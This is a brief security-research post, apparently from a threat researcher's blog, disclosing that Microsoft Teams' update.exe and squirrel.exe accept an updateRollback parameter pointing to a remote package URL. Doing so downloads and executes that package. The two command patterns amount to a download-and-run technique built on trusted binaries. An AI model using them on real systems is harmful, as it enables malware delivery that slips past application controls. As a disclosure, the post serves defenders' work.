Part 1 : https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12

Found another vulnerable parameter where Microsoft Teams do remote download and execute payload.

Vulnerable parameter :
%localappdata%/Microsoft/Teams/update.exe — updateRollback=[URL to package]
%localappdata%/Microsoft/Teams/current/squirrel.exe — updateRollback=[URL to package]

Note : It is affecting wide usage of squirrel packages, Hope Microsoft Teams will be fixed as soon as possible.

--

--

Reegun J

#800080 Teamer | Threat Researcher | Malware analyst | Reverse Engineer